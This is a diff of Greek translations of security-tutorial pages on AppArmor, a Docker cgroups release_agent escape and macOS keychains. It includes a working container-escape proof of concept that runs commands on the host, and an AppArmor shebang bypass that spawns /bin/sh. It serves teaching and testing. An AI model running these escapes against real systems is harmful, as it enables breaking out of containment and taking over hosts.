Το AppArmor είναι μια **ενίσχυση πυρήνα σχεδιασμένη για να περιορίζει τους πόρους που είναι διαθέσιμοι σε προγράμματα μέσω προφίλ ανά πρόγραμμα**, εφαρμόζοντας αποτελεσματικά τον Εξαναγκαστικό Έλεγχο Πρόσβασης (MAC) δεσμεύοντας τα χαρακτηριστικά ελέγχου πρόσβασης απευθείας στα προγράμματα αντί για τους χρήστες. Αυτό το σύστημα λειτουργεί με τον **φόρτωση προφίλ στον πυρήνα**, συνήθως κατά την εκκίνηση, και αυτά τα προφίλ καθορίζουν ποιους πόρους μπορεί να έχει πρόσβαση ένα πρόγραμμα, όπως συνδέσεις δικτύου, πρόσβαση σε ωμές συνδέσεις και άδειες αρχείων.
|
||||
Το AppArmor είναι μια **ενίσχυση πυρήνα σχεδιασμένη για να περιορίζει τους πόρους που είναι διαθέσιμοι σε προγράμματα μέσω προφίλ ανά πρόγραμμα**, εφαρμόζοντας αποτελεσματικά τον Επιβεβλημένο Έλεγχο Πρόσβασης (MAC) δεσμεύοντας τα χαρακτηριστικά ελέγχου πρόσβασης απευθείας στα προγράμματα αντί για τους χρήστες. Αυτό το σύστημα λειτουργεί με τον **φόρτωση προφίλ στον πυρήνα**, συνήθως κατά την εκκίνηση, και αυτά τα προφίλ καθορίζουν ποιους πόρους μπορεί να έχει πρόσβαση ένα πρόγραμμα, όπως συνδέσεις δικτύου, πρόσβαση σε ροές socket και άδειες αρχείων.
|
||||
|
||||
Υπάρχουν δύο λειτουργικές καταστάσεις για τα προφίλ AppArmor:
|
||||
|
||||
- **Λειτουργία Επιβολής**: Αυτή η λειτουργία επιβάλλει ενεργά τις πολιτικές που έχουν οριστεί στο προφίλ, αποκλείοντας ενέργειες που παραβιάζουν αυτές τις πολιτικές και καταγράφοντας οποιεσδήποτε προσπάθειες παραβίασής τους μέσω συστημάτων όπως το syslog ή το auditd.
|
||||
- **Λειτουργία Διαμαρτυρίας**: Σε αντίθεση με τη λειτουργία επιβολής, η λειτουργία διαμαρτυρίας δεν αποκλείει ενέργειες που παραβιάζουν τις πολιτικές του προφίλ. Αντ' αυτού, καταγράφει αυτές τις προσπάθειες ως παραβιάσεις πολιτικής χωρίς να επιβάλλει περιορισμούς.
|
||||
- **Λειτουργία Διαμαρτυρίας**: Αντίθετα με τη λειτουργία επιβολής, η λειτουργία διαμαρτυρίας δεν αποκλείει ενέργειες που παραβιάζουν τις πολιτικές του προφίλ. Αντ' αυτού, καταγράφει αυτές τις προσπάθειες ως παραβιάσεις πολιτικής χωρίς να επιβάλλει περιορισμούς.
|
||||
|
||||
### Στοιχεία του AppArmor
|
||||
|
||||
|
@ -47,9 +47,9 @@
|
|||
### Διαδρομές Προφίλ
|
||||
|
||||
Τα προφίλ Apparmor συνήθως αποθηκεύονται στο _**/etc/apparmor.d/**_\
|
||||
Με την εντολή `sudo aa-status` θα μπορείτε να καταλάβετε τα δυαδικά που περιορίζονται από κάποιο προφίλ. Αν μπορείτε να αλλάξετε το χαρακτήρα "/" με ένα τελεία από τη διαδρομή κάθε καταχωρημένου δυαδικού, θα λάβετε το όνομα του προφίλ apparmor μέσα στο αναφερόμενο φάκελο.
|
||||
Με την εντολή `sudo aa-status` θα μπορείτε να καταλογίσετε τα δυαδικά που περιορίζονται από κάποιο προφίλ. Αν μπορείτε να αλλάξετε το χαρακτήρα "/" με ένα τελεία από τη διαδρομή κάθε καταχωρημένου δυαδικού, θα λάβετε το όνομα του προφίλ apparmor μέσα στο αναφερόμενο φάκελο.
|
||||
|
||||
Για παράδειγμα, ένα προφίλ **apparmor** για το _/usr/bin/man_ θα βρίσκεται στο _/etc/apparmor.d/usr.bin.man_
|
||||
Για παράδειγμα, ένα **προφίλ apparmor** για _/usr/bin/man_ θα βρίσκεται στο _/etc/apparmor.d/usr.bin.man_
|
||||
|
||||
### Εντολές
|
||||
```bash
|
||||
|
@ -61,9 +61,9 @@ aa-genprof #generate a new profile
|
|||
aa-logprof #used to change the policy when the binary/program is changed
|
||||
aa-mergeprof #used to merge the policies
|
||||
```
|
||||
## Δημιουργία ενός προφίλ
|
||||
## Δημιουργία προφίλ
|
||||
|
||||
* Για να υποδείξετε το επηρεαζόμενο εκτελέσιμο, επιτρέπονται **απόλυτα μονοπάτια και μπαλαντέρ** (για αντιστοίχιση αρχείων) για την καθορισμό αρχείων.
|
||||
* Για να υποδείξετε τον επηρεαζόμενο εκτελέσιμο, επιτρέπονται **απόλυτα μονοπάτια και μπαλαντέρ** (για file globbing) για την καθορισμό αρχείων.
|
||||
* Για να υποδείξετε την πρόσβαση που το δυαδικό θα έχει σε **αρχεία** μπορούν να χρησιμοποιηθούν οι ακόλουθοι **έλεγχοι πρόσβασης**:
|
||||
* **r** (ανάγνωση)
|
||||
* **w** (εγγραφή)
|
||||
|
@ -79,8 +79,8 @@ aa-mergeprof #used to merge the policies
|
|||
|
||||
### aa-genprof
|
||||
|
||||
Για να ξεκινήσετε εύκολα τη δημιουργία ενός προφίλ, μπορείτε να χρησιμοποιήσετε το apparmor. Είναι δυνατόν να κάνετε **το apparmor να ελέγξει τις ενέργειες που εκτελεί ένα δυαδικό και στη συνέχεια να σας επιτρέψει να αποφασίσετε ποιες ενέργειες θέλετε να επιτρέψετε ή να απαγορεύσετε**.\
|
||||
Απλώς χρειάζεται να εκτελέσετε:
|
||||
Για να ξεκινήσετε εύκολα τη δημιουργία ενός προφίλ, το apparmor μπορεί να σας βοηθήσει. Είναι δυνατόν να κάνετε **το apparmor να ελέγξει τις ενέργειες που εκτελεί ένα δυαδικό και στη συνέχεια να σας επιτρέψει να αποφασίσετε ποιες ενέργειες θέλετε να επιτρέψετε ή να απαγορεύσετε**.\
|
||||
Απλά χρειάζεται να εκτελέσετε:
|
||||
```bash
|
||||
sudo aa-genprof /path/to/binary
|
||||
```
|
||||
|
@ -136,7 +136,7 @@ sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
|
|||
sudo aa-logprof
|
||||
```
|
||||
{% hint style="info" %}
|
||||
Χρησιμοποιώντας τα πλήκτρα βέλους μπορείτε να επιλέξετε τι θέλετε να επιτρέώσετε/απαγορεύσετε/ό,τιδήποτε
|
||||
Χρησιμοποιώντας τα πλήκτρα βέλους μπορείτε να επιλέξετε τι θέλετε να επιτρέώσετε/απαγορεύσετε/οτιδήποτε
|
||||
{% endhint %}
|
||||
|
||||
### Διαχείριση ενός Προφίλ
|
||||
|
@ -196,9 +196,9 @@ docker-default
|
|||
|
||||
* **Πρόσβαση** σε όλο το **δίκτυο**
|
||||
* Δεν έχει οριστεί **κάποια ικανότητα** (Ωστόσο, μερικές ικανότητες θα προέλθουν από τη συμπερίληψη βασικών κανόνων βάσης, δηλαδή #include \<abstractions/base>)
|
||||
* **Εγγραφή** σε οποιοδήποτε αρχείο **/proc** δεν επιτρέπεται
|
||||
* Άλλοι **υποκατάλογοι**/**αρχεία** του /**proc** και /**sys** απαγορεύεται η πρόσβαση για ανάγνωση/εγγραφή/κλείδωμα/σύνδεση/εκτέλεση
|
||||
* **Μοντάρισμα** δεν επιτρέπεται
|
||||
* **Απαγορεύεται η εγγραφή** σε οποιοδήποτε αρχείο **/proc**
|
||||
* Άλλοι **υποκατάλογοι/αρχεία** του /**proc** και /**sys** έχουν **απαγορευμένη** πρόσβαση για ανάγνωση/εγγραφή/κλείδωμα/σύνδεση/εκτέλεση
|
||||
* **Δεν επιτρέπεται η τοποθέτηση (mount)**
|
||||
* Η **Ptrace** μπορεί να εκτελεστεί μόνο σε ένα διεργασία που περιορίζεται από το **ίδιο προφίλ apparmor**
|
||||
|
||||
Μόλις **εκτελέσετε ένα container docker**, θα πρέπει να δείτε την ακόλουθη έξοδο:
|
||||
|
@ -206,7 +206,7 @@ docker-default
|
|||
1 processes are in enforce mode.
|
||||
docker-default (825)
|
||||
```
|
||||
Σημειώστε ότι **το apparmor θα αποκλείσει ακόμα και τα προνόμια δικαιωμάτων** που έχουν χορηγηθεί στον εκτελέσιμο προεπιλεγμένα. Για παράδειγμα, θα μπορεί **να αποκλείσει την άδεια εγγραφής μέσα στον φάκελο /proc ακόμα κι αν έχει χορηγηθεί η δυνατότητα SYS\_ADMIN** επειδή από προεπιλογή το προφίλ apparmor του docker απορρίπτει αυτήν την πρόσβαση:
|
||||
Σημειώστε ότι **το apparmor θα αποκλείσει ακόμα και τα προνόμια δικαιωμάτων** που έχουν χορηγηθεί στον ελατήριο από προεπιλογή. Για παράδειγμα, θα μπορεί να **αποκλείσει την άδεια εγγραφής μέσα στον φάκελο /proc ακόμα κι αν έχει χορηγηθεί η δυνατότητα SYS\_ADMIN** επειδή από προεπιλογή το προφίλ apparmor του docker αρνείται αυτήν την πρόσβαση:
|
||||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
|
||||
echo "" > /proc/stat
|
||||
|
@ -225,14 +225,14 @@ docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-
|
|||
* `--cap-drop=ALL --cap-add=SYS_PTRACE` αφαιρεί όλες τις δυνατότητες και δίνει μόνο την `SYS_PTRACE`
|
||||
|
||||
{% hint style="info" %}
|
||||
Συνήθως, όταν **ανακαλύπτετε** ότι έχετε μια **προνομιούχα δυνατότητα** διαθέσιμη **μέσα** σε ένα **docker** container **αλλά** κάποιο τμήμα του **exploit δεν λειτουργεί**, αυτό οφείλεται στο ότι το docker **apparmor το εμποδίζει**.
|
||||
Συνήθως, όταν **ανακαλύπτετε** ότι έχετε μια **προνομιούχα δυνατότητα** διαθέσιμη **μέσα** σε ένα **docker container** αλλά κάποιο τμήμα του **exploit δεν λειτουργεί**, αυτό οφείλεται στο ότι το docker **apparmor το εμποδίζει**.
|
||||
{% endhint %}
|
||||
|
||||
### Παράδειγμα
|
||||
|
||||
(Παράδειγμα από [**εδώ**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/))
|
||||
|
||||
Για να εικονίσουμε τη λειτουργικότητα του AppArmor, δημιούργησα ένα νέο προφίλ Docker "mydocker" με την παρακάτω γραμμή προστεθεισμένη:
|
||||
Για να εικονογραφήσω τη λειτουργικότητα του AppArmor, δημιούργησα ένα νέο προφίλ Docker "mydocker" με την παρακάτω γραμμή προστεθειμένη:
|
||||
```
|
||||
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
|
||||
```
|
||||
|
@ -245,7 +245,7 @@ sudo apparmor_parser -r -W mydocker
|
|||
$ sudo apparmor_status | grep mydocker
|
||||
mydocker
|
||||
```
|
||||
Όπως φαίνεται παρακάτω, λαμβάνουμε σφάλμα όταν προσπαθούμε να αλλάξουμε το "/etc/" επειδή το προφίλ του AppArmor εμποδίζει την εγγραφή πρόσβασης στο "/etc".
|
||||
Όπως φαίνεται παρακάτω, λαμβάνουμε σφάλμα όταν προσπαθούμε να αλλάξουμε το "/etc/" επειδή το προφίλ του AppArmor αποτρέπει την εγγραφή πρόσβασης στο "/etc".
|
||||
```
|
||||
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
|
||||
chmod: /etc/hostname: Permission denied
|
||||
|
@ -268,7 +268,7 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
|
|||
|
||||
### Παράκαμψη Shebang του AppArmor
|
||||
|
||||
Σε [**αυτό το σφάλμα**](https://bugs.launchpad.net/apparmor/+bug/1911431) μπορείτε να δείτε ένα παράδειγμα πώς **ακόμα κι αν αποτρέπετε την εκτέλεση του perl με συγκεκριμένους πόρους**, αν απλά δημιουργήσετε ένα shell script **προσδιορίζοντας** στην πρώτη γραμμή **`#!/usr/bin/perl`** και **εκτελέσετε το αρχείο απευθείας**, θα μπορείτε να εκτελέσετε ό,τι θέλετε. Π.χ.:
|
||||
Σε [**αυτό το σφάλμα**](https://bugs.launchpad.net/apparmor/+bug/1911431) μπορείτε να δείτε ένα παράδειγμα πώς **ακόμα κι αν αποτρέπετε την εκτέλεση του perl με συγκεκριμένους πόρους**, αν απλώς δημιουργήσετε ένα shell script **προσδιορίζοντας** στην πρώτη γραμμή **`#!/usr/bin/perl`** και **εκτελέσετε το αρχείο απευθείας**, θα μπορείτε να εκτελέσετε ό,τι θέλετε. Π.χ.:
|
||||
```perl
|
||||
echo '#!/usr/bin/perl
|
||||
use POSIX qw(strftime);
|
||||
|
@ -278,13 +278,13 @@ exec "/bin/sh"' > /tmp/test.pl
|
|||
chmod +x /tmp/test.pl
|
||||
/tmp/test.pl
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
|
@ -296,7 +296,7 @@ chmod +x /tmp/test.pl
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -1,28 +1,28 @@
|
|||
# Διαφυγή από cgroups με το Docker release_agent
|
||||
# Διαφυγή προνομίων Docker release\_agent cgroups
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -36,7 +36,7 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
|||
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
|
||||
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
|
||||
```
|
||||
Η απόδειξη του concept (PoC) δείχνει έναν τρόπο εκμετάλλευσης των cgroups με τη δημιουργία ενός αρχείου `release_agent` και την ενεργοποίηση της κλήσης του για να εκτελέσει αυθαίρετες εντολές στον υπολογιστή-φιλοξενούμενο του container. Εδώ υπάρχει μια ανάλυση των βημάτων που εμπλέκονται:
|
||||
Η απόδειξη του concept (PoC) δείχνει έναν τρόπο εκμετάλλευσης των cgroups με τη δημιουργία ενός αρχείου `release_agent` και την ενεργοποίηση της κλήσης του για να εκτελέσει αυθαίρετες εντολές στον υπολογιστή-φιλοξενητή του container. Εδώ υπάρχει μια ανάλυση των βημάτων που εμπλέκονται:
|
||||
|
||||
1. **Προετοιμασία του Περιβάλλοντος:**
|
||||
- Δημιουργείται ένας κατάλογος `/tmp/cgrp` για να λειτουργήσει ως σημείο προσάρτησης για το cgroup.
|
||||
|
@ -58,25 +58,25 @@ host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
|||
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||
```
|
||||
4. **Δημιουργία και Ρύθμιση του Σεναρίου /cmd:**
|
||||
- Το σενάριο /cmd δημιουργείται μέσα στο container και ρυθμίζεται να εκτελεί την εντολή ps aux, μεταφέροντας την έξοδο σε ένα αρχείο με όνομα /output στο container. Καθορίζεται ο πλήρης διαδρομής του /output στον host.
|
||||
- Το σενάριο /cmd δημιουργείται μέσα στο container και ρυθμίζεται να εκτελεί την εντολή ps aux, με την έξοδο να ανακατευθύνεται σε ένα αρχείο με όνομα /output στο container. Καθορίζεται ο πλήρης διαδρομής του /output στον host.
|
||||
```shell
|
||||
echo '#!/bin/sh' > /cmd
|
||||
echo "ps aux > $host_path/output" >> /cmd
|
||||
chmod a+x /cmd
|
||||
```
|
||||
5. **Εκκίνηση της Επίθεσης:**
|
||||
- Ένας διεργασία ξεκινάει εντός του παιδικού cgroup "x" και τερματίζεται αμέσως.
|
||||
- Ένας διεργασία ξεκινάει μέσα στο παιδί cgroup "x" και τερματίζεται αμέσως.
|
||||
- Αυτό ενεργοποιεί το `release_agent` (το σενάριο /cmd), το οποίο εκτελεί την εντολή ps aux στον κεντρικό υπολογιστή και γράφει την έξοδο στο /output μέσα στο container.
|
||||
```shell
|
||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
|
@ -84,14 +84,14 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,11 +2,11 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,13 +14,13 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια **dark-web** κινητοποιημένη μηχανή αναζήτησης που προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -31,11 +31,11 @@
|
|||
## Κύρια Keychains
|
||||
|
||||
* Το **Keychain του Χρήστη** (`~/Library/Keychains/login.keycahin-db`), το οποίο χρησιμοποιείται για την αποθήκευση **συγκεκριμένων διαπιστευτηρίων χρήστη** όπως κωδικοί εφαρμογών, κωδικοί internet, πιστοποιητικά που δημιουργήθηκαν από τον χρήστη, κωδικοί δικτύου και δημιουργημένα δημόσια/ιδιωτικά κλειδιά χρήστη.
|
||||
